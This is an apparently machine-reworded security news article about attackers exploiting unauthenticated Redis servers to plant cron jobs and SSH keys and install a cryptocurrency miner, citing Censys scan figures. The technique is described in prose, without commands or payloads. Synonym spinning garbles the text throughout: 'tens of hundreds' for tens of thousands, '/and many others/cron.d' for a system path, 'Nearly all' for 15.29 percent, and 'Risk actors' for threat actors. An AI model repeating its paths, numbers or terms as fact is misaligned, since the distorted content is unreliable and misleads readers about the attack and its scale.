Risk actors focused tens of hundreds of unauthenticated Redis servers uncovered on the Web as a part of a cryptocurrency marketing campaign.
Redis is a well-liked open supply knowledge construction instrument that can be utilized as an in-memory distributed database, message dealer, or cache. The instrument is just not designed to be uncovered on the Web, nevertheless, the researchers detected tens of hundreds of publicly accessible Redis cases with out authentication.
Researcher Victor Zhu detailed a Redis hack vulnerability that could possibly be exploited to compromise Redis cases uncovered on-line.
“Below sure circumstances, if Redis is operating below the basis account (or in no way), attackers can write an SSH public key file to the basis account, logging in on to the sufferer’s server through SSH. This may enable hackers to realize server privileges, delete or steal knowledge, and even result in encryption extortion, critically jeopardizing regular enterprise companies.” learn the put up revealed by Zhu on September 11, 2022.
Now, Censys researchers are warning of tens of hundreds of unauthenticated Redis servers uncovered on the Web which are below assault.
Risk actors goal these cases to put in a cryptocurrency miner.
“There are 39,405 unauthenticated Redis companies out of a complete of 350,675 Redis companies on the general public Web.” warns Censys. “Almost 50% of unauthenticated Redis companies on the Web present indicators of a tried dedication.”
“The final thought behind this exploitation approach is to configure Redis to jot down its file-based database to a listing that accommodates some technique of authorizing a consumer (resembling including a key to ‘.ssh/authorized_keys’), or to start out a course of (resembling including a script to ‘/and many others/cron.d’),” provides Censys.
Consultants discovered proof displaying the continuing hacking marketing campaign, risk actors tried to retailer malicious crontab entries within the “/var/spool/cron/root” file utilizing varied Redis keys prefixed with “backup”. The crontab entries allowed the attackers to execute a shell script hosted on a distant server.
The shell script was designed to carry out the next malicious actions:
- Stops and disables any operating security-related processes
- Stops and disables any operating system monitoring course of
- Removes and purges all safety and system associated log recordsdata, together with shell histories (eg .bash_history).
- Add a brand new SSH key to the basis consumer’s authorized_keys file
- Disable iptables firewall
- Set up varied hacking and scanning instruments like “masscan”
- Set up and run the XMRig cryptocurrency mining app
The researchers used a current listing of unauthenticated Redis companies operating on TCP port 6379 to run a singular scan that regarded for the existence of the “backup1” key on every host. Censys discovered that of the 31,239 unauthenticated Redis servers on this listing, 15,526 hosts had this set of keys. These cases have been focused by risk actors utilizing the approach described above.
Nearly all of Redis servers uncovered to the Web are situated in China (15.29%), adopted by Germany (14.11%) and Singapore (12.43%).
“Nonetheless, this doesn’t imply that there are greater than 15 thousand compromised hosts. The circumstances crucial for this vulnerability to succeed are unlikely to exist for every of those hosts. The principle purpose many of those makes an attempt will fail is that the Redis service should be run as a consumer with the correct permissions to jot down to the “/var/spool/cron” listing (i.e. root).” the report concludes. “Nonetheless, this may be the case when operating Redis inside a container (resembling a docker), the place the method could possibly be seen operating as root and permit the attacker to jot down these recordsdata. However on this case, solely affected the container, not the bodily host.”
The report additionally features a listing of mitigation measures for these assaults.
Observe me on twitter: @security issues Y Fb
Pierluigi Paganini
(SecurityIssues – piracy, mining)
share on